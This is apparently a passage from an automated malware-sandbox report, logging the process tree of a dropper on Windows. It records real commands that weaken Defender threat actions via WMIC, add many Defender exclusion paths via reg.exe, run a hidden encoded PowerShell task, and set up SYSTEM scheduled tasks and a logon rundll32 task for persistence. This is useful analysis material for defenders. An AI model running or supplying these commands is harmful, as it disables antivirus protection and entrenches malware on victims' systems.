/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2012

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:684

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1064

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:316

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1704

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:2040

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1220

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1976

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2000

C:\Windows\system32\taskeng.exe
taskeng.exe {AD4220C9-1DD8-41D8-9554-1B8AA17C1A07} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1940

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\pcwFfkT.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\pcwFfkT.exe nv /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1984

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1392

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:968

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1020

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1724

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1632

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:836

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:2036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2040

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:600

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gKecbCfYm" /SC once /ST 01:12:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1676

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gKecbCfYm"
3⤵
PID:1240

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gKecbCfYm"
3⤵
PID:1668

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
3⤵
PID:888

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1976

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2016

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1532

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1728

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1992

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\rUaCEWwDdnKMYjxw\KUauqMfu\oxYidbRdgzFvSHyR.wsf"
3⤵
PID:1764

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\rUaCEWwDdnKMYjxw\KUauqMfu\oxYidbRdgzFvSHyR.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:944

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1844

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1452

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1764

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1216

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1620

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:456

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:888

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1736

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:384

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pDJsDjHXtdwyYAVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:456

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:32
4⤵
PID:828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\rUaCEWwDdnKMYjxw" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2040

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jrzNdZzegeVMzeqYf" /SC once /ST 00:15:30 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\wfgcocW.exe\" gh /site_id 767 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1764

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "jrzNdZzegeVMzeqYf"
3⤵
PID:952

C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\wfgcocW.exe
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\wfgcocW.exe gh /site_id 767 /S
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1492

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:340

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1004

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1552

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1028

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:956

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:964

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:1648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:824

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1972

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1384

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1636

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
PID:1240

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqZkKdgiyjBiVwZYfn"
3⤵
PID:1992

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:1764

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
4⤵
PID:864

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:1536

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
4⤵
PID:1144

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\anjFGKdzU\NQqHmR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JRajWlGIFNTafba" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1052

C:\Windows\SysWOW64\schtasks.exe
